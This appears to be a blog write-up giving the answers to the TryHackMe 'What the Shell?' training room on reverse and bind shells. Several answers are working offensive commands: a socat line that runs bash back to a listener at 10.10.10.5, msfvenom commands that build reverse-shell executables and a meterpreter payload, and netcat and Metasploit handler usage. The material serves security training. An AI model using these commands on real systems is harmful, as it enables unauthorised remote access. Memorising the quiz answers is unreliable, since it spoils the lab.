Home front-page port 80-shoopyu What the Shell? | Tryhackme
Post
Cancel

front-page port 80-shoopyu What the Shell? | Tryhackme

Posted Aug 12, 2022
By Cotes Chung
2 min read

Β 

simple-ctf-logo

What the shell?

Β  An introduction to sending and receiving (reverse/bind) shells when exploiting target machines.

Task 3

πŸ’’note: Task 1,2 have no answer needed

Q: Which type of shell connects back to a listening port on your computer, Reverse (R) or Bind (B)?

A: R

Q: You have injected malicious shell code into a website. Is the shell you receive likely to be interactive? (Y or N)

A: N

Q: When using a bind shell, would you execute a listener on the Attacker (A) or the Target (T)?

A: T

Β 

Task 4 Netcat

Q: Which option tells netcat to listen?

A: -l

Q: How would you connect to a bind shell on the IP address: 10.10.10.11 with port 8080?

A: nc 10.10.10.11 8080

Β 

Task 5 Netcat Shell Stabilisation

Q: How would you change your terminal size to have 238 columns?

A: stty cols 238

Q: What is the syntax for setting up a Python3 webserver on port 80?

A: sudo python3 -m http.server 80

Β 

Task 6 Socat

Q: How would we get socat to listen on TCP port 8080?

A: TCP-L:8080

Β 

Task 7 Socat Encrypted Shells

Q: What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called β€œencrypt.pem”

A: socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0

Q: If your IP is 10.10.10.5, what syntax would you use to connect back to this listener?

A: socat OPENSSL:10.10.10.5:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

Β 

Task 8 Common Shell Payloads

Q: What command can be used to create a named pipe in Linux?

A: mkfifo

– Β 

Task 9 msfvenom

Q: Generate a staged reverse shell for a 64 bit Windows target, in a .exe format using your TryHackMe tun0 IP address and a chosen port

A: msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port number>

Q: Which symbol is used to show that a shell is stageless?

A: _

Q: What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell

A: msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443

Task 10 Metasploit multi/handler

Q: What command can be used to start a listener in the background?

A: exploit -j

Q: If we had just received our tenth reverse shell in the current Metasploit session, what would be the command used to foreground it?

A: sessions 10

Write Up, TryHackMe
walkthrough THM Tryhackme shell socat webshell reverse shell msfvenom shell bind shell
This post is licensed under CC BY 4.0 by the author.
Contents

front-page port 80-shoopyu Cybersecurity Resources πŸ’»πŸ›‘οΈ

front-page port 80-shoopyu Meow | HackTheBox Easy